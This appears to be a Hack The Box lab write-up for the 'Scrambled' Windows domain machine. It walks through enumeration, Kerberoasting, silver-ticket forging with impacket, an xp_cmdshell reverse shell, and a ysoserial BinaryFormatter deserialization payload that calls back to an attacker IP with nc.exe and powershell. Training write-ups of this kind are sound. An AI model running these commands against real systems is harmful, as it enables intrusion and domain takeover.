← Back to list

HTB: Scrambled

Machine Link: https://app.hackthebox.com/machines/Scrambled

Nazarov Samir · 2026-05-31 17:40 · 50 claps · 7.8 min read
#hackthebox #ad-pentesting #scrambled #reverse-engineering #insecure-deserialization
Open on Medium ↗
Wiki topics: 🔒 · Cybersecurity

HTB: Scrambled

Machine Link: https://app.hackthebox.com/machines/Scrambled

Enumeration:

Nmap scan:

nmap -sCV -p- -T4 --min-rate 10000 10.129.7.222  -oN nmap_result
Starting Nmap 7.98 ( https://nmap.org ) at 2026-05-31 08:23 -0400
Stats: 0:03:33 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.68% done; ETC: 08:27 (0:00:00 remaining)
Nmap scan report for scrm.local (10.129.7.222)
Host is up (0.67s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  spark         Apache Spark
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn?
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-05-31T12:27:29+00:00; -2s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after:  2121-06-08T22:39:53
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after:  2121-06-08T22:39:53
|_ssl-date: 2026-05-31T12:27:29+00:00; -1s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-05-31T07:49:57
|_Not valid after:  2056-05-31T07:49:57
|_ssl-date: 2026-05-31T12:27:29+00:00; -1s from scanner time.
| ms-sql-info: 
|   10.129.7.222:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-05-31T12:27:29+00:00; -1s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after:  2121-06-08T22:39:53
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-05-31T12:27:29+00:00; -1s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after:  2121-06-08T22:39:53
4411/tcp  open  found?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|_    ERROR_UNKNOWN_COMMAND;
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  unknown
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
49703/tcp open  msrpc         Microsoft Windows RPC
49720/tcp open  msrpc         Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port139-TCP:V=7.98%I=7%D=5/31%Time=6A1C2869%P=x86_64-pc-linux-gnu%r(Get
SF:Request,5,"\x83\0\0\x01\x8f")%r(GenericLines,5,"\x83\0\0\x01\x8f")%r(HT
SF:TPOptions,5,"\x83\0\0\x01\x8f")%r(RTSPRequest,5,"\x83\0\0\x01\x8f")%r(R
SF:PCCheck,5,"\x83\0\0\x01\x8f")%r(DNSVersionBindReqTCP,5,"\x83\0\0\x01\x8
SF:f")%r(DNSStatusRequestTCP,5,"\x83\0\0\x01\x8f")%r(Help,5,"\x83\0\0\x01\
SF:x8f")%r(SSLSessionReq,5,"\x83\0\0\x01\x8f")%r(TerminalServerCookie,5,"\
SF:x83\0\0\x01\x8f")%r(TLSSessionReq,5,"\x83\0\0\x01\x8f")%r(Kerberos,5,"\
SF:x83\0\0\x01\x8f")%r(X11Probe,5,"\x83\0\0\x01\x8f")%r(FourOhFourRequest,
SF:5,"\x83\0\0\x01\x8f")%r(LPDString,5,"\x83\0\0\x01\x8f")%r(LDAPSearchReq
SF:,5,"\x83\0\0\x01\x8f")%r(LDAPBindReq,5,"\x83\0\0\x01\x8f")%r(SIPOptions
SF:,5,"\x83\0\0\x01\x8f")%r(LANDesk-RC,5,"\x83\0\0\x01\x8f")%r(NCP,5,"\x83
SF:\0\0\x01\x8f")%r(NotesRPC,5,"\x83\0\0\x01\x8f")%r(JavaRMI,5,"\x83\0\0\x
SF:01\x8f")%r(WMSRequest,5,"\x83\0\0\x01\x8f")%r(oracle-tns,5,"\x83\0\0\x0
SF:1\x8f")%r(ms-sql-s,5,"\x83\0\0\x01\x8f")%r(afp,5,"\x83\0\0\x01\x8f")%r(
SF:giop,5,"\x83\0\0\x01\x8f");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port4411-TCP:V=7.98%I=7%D=5/31%Time=6A1C2869%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(GetRequest,35,"SCR
SF:AMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(HTTPOption
SF:s,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(R
SF:TSPRequest,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\
SF:r\n")%r(RPCCheck,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(DNSVersionBi
SF:ndReqTCP,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(DNSStatusRequestTCP,
SF:1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(Help,35,"SCRAMBLECORP_ORDERS_
SF:V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(SSLSessionReq,1D,"SCRAMBLEC
SF:ORP_ORDERS_V1\.0\.3;\r\n")%r(TerminalServerCookie,1D,"SCRAMBLECORP_ORDE
SF:RS_V1\.0\.3;\r\n")%r(TLSSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\
SF:n")%r(Kerberos,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SMBProgNeg,1D,
SF:"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(X11Probe,1D,"SCRAMBLECORP_ORDERS
SF:_V1\.0\.3;\r\n")%r(FourOhFourRequest,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\
SF:r\nERROR_UNKNOWN_COMMAND;\r\n")%r(LPDString,35,"SCRAMBLECORP_ORDERS_V1\
SF:.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(LDAPSearchReq,1D,"SCRAMBLECORP
SF:_ORDERS_V1\.0\.3;\r\n")%r(LDAPBindReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;
SF:\r\n")%r(SIPOptions,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_
SF:COMMAND;\r\n")%r(LANDesk-RC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(T
SF:erminalServer,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(NCP,1D,"SCRAMBL
SF:ECORP_ORDERS_V1\.0\.3;\r\n")%r(NotesRPC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.
SF:3;\r\n")%r(JavaRMI,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(WMSRequest
SF:,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(oracle-tns,1D,"SCRAMBLECORP_
SF:ORDERS_V1\.0\.3;\r\n")%r(ms-sql-s,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n
SF:")%r(afp,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(giop,1D,"SCRAMBLECOR
SF:P_ORDERS_V1\.0\.3;\r\n");
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-05-31T12:26:50
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 242.37 seconds

Domain: scrm.local Domain Controller: dc1.scrm.local

We see that the http service is running on port 80:

Note that port 4411 is not standard. Let’s look at the banner with nc.

This is similar to a program used internally.

NTLM authentication has been disabled on the site for security purposes. Because NTLM is disabled, we will no longer be able to use some standard tools.

It is possible to find some possible usernames on the “Contacting IT support” page.

On the “Request a password reset” page, the Support team noted that if the password is forgotten, the password will be the same as the username.

We can write usernames to a file and check them.

We now know that the password for the user ksimpson is also ksimpson.

The user ksimpson has read permission to the Public share. Since NTLM is disabled, you can join the share with impacket-smbclient.

impacket-smbclient scrm.local/ksimpson:ksimpson@dc1.scrm.local  -k

The pdf file does not contain any credentials. It only tells how the attacker compromised the network. And the useful information here is that it provides information about the existence of credentials in the SQL database.

Kerberoasting

Since we now have an active username and password on the domain, we can perform a Kerberosting attack.

NOTE: Kerberoasting-In this attack, the SPN (Service Principal Name) of service accounts is targeted. The attacker sends a request to the Domain Controller with a trusted domain user account and obtains a Service Ticket (TGS) for that SPN.

Obtaining ST for a user with an SPN.

impacket-GetUserSPNs -dc-host dc1.scrm.local scrm.local/ksimpson:ksimpson -request -k

As we can see, the sqlsvc user is a service account. SPN:MSSQLSvc/dc1.scrm.local:1433. We can crack the hash offline with brute force.

Silver Ticket attack

Note: A Silver Ticket attack is the process of creating a fake access ticket to a specific targeted service (e.g. MSSQL, CIFS/Share, HTTP, WinRM) by exploiting a vulnerability in the Kerberos authentication protocol in Active Directory (AD) environments.

For a silver ticket attack, we need the NTLM hash, domain SID, and SPN of the service account.

NTLM hash generator. Obtaining a domain SID:

impacket-getPac scrm.local/ksimpson:ksimpson -targetUser Administrator

Creating a fake TGS.

impacket-ticketer -nthash B999A16500B87D17EC7F2E2A68778F05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn SPN:MSSQLSvc/dc1.scrm.local:1433 administrator

export KRB5CCNAME=administrator.ccache 

Connecting to MSSQL with TGS:

We just mentioned that the PDF contains credentials in the database. So let’s look at the tables one by one.

We can execute commands on the system by activating the xp_cmdshell function. Let’s get a reverse shell using this method.

Reverse-shell:

I couldn’t find anything useful from this user system. Let’s look at the permissions for smb shares with the miscsvc user.

We have read permission on the non-default IT share.

To run the program, I put the files in a Windows VM. You need to disconnect to VPN on the attacker machine and connect to VPN in Windows. And edit the C:\windows\system32\drivers\etc\hosts file as follows:

I used OpenVPN to connect to the VPN.After running the program, type dc1.scrm.local in the server section of edit.

The program has a login section and I checked all domain users there but couldn’t get any results.

Reverse Engineering

If we examine the exe file with strings, we can see that it is an executable file written in .NET.

I used the **ILSpy tool to decompile the exe file. When looking at the source code, we can see that if the username is scrmdev**, there is no need to enter a password.

We were able to log in directly with the scrmdev user without entering a password.

The program also has a debug logging function, which writes the processes that occur when creating a new order to a log file in the folder where the app is located.The function can be enabled from the tools section.

debug log

debug log

We can see from the log file that the data is first converted to binary and then serialized. A connection is established with the server and sent using the UPLOAD_ORDER function. Then, the deserilization process takes place on the server. If we can send this data ourselves, insecure deserilization will have occurred here. And we will be able to execute our malicious code on the server. Let’s establish a connection with nc and check.

This is great news, we can send serialized data. You can use** ysoserial.exe** for this.

First, let’s create a malicious payload with ysoserial.exe.I used nc to get a reverse shell.(I downloaded nc to the Temp folder on the target machine)

ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "C:\Temp\nc.exe 10.10.14.87 4242 -e powershell.exe"

Let’s send the serialized payload to the server and get a reverse shell:

system

system

If I make any mistakes, don’t hesitate to let me know.


메타데이터
post_id
97083102236e
slug
htb-scrambled-97083102236e
url
https://medium.com/@s4m1r/htb-scrambled-97083102236e
canonical_url
https://medium.com/@s4m1r/htb-scrambled-97083102236e
author_url
https://medium.com/@s4m1r
status
ok
fetched_at
2026-06-13 00:25:45